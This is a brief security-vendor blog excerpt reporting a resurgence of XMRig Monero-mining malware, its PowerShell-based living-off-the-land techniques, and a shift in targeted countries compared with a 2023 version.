Digging Gold with a Spoon – Resurgence of Monero-mining Malware

Resurgence of Monero-mining Malware

Is it the same XMRig threat from the past?

What is apparent with the current XMRig threat is its multi-staged approach and use of LOLBAS (Living Off the Land Binaries and Scripts) techniques. These techniques leverage pre-installed Windows tools such as PowerShell for download and execution of its payload, detection evasion, and scheduled task persistence. These initial behaviors were relieved from the malicious XMRig binaries observed in 2023, which shrunk the current binary version down to about 1MB and focused on cryptomining only.

A notable observation is that the scripts were written in plain text, without any form of encoding or obfuscation. The scripts even had straightforward comments describing the use of the commands indicating that it may have been created by LLMs or copied from a certain malware kit or a work of “script kiddies”. Although the scripts may have been written in a simple manner, this simplicity proved effective, with a very low reputation score from antivirus vendors (according to VirusTotal) at the time of discovery.

The current binary version targets a more diverse set of countries which still includes Russia, but now also added Belgium, Greece, and China to the roster. In comparison, the 2023 version, according to our telemetry and intelligence data, primarily affected Russia, Azerbaijan, and Uzbekistan.

To read the complete article see: G Data Blog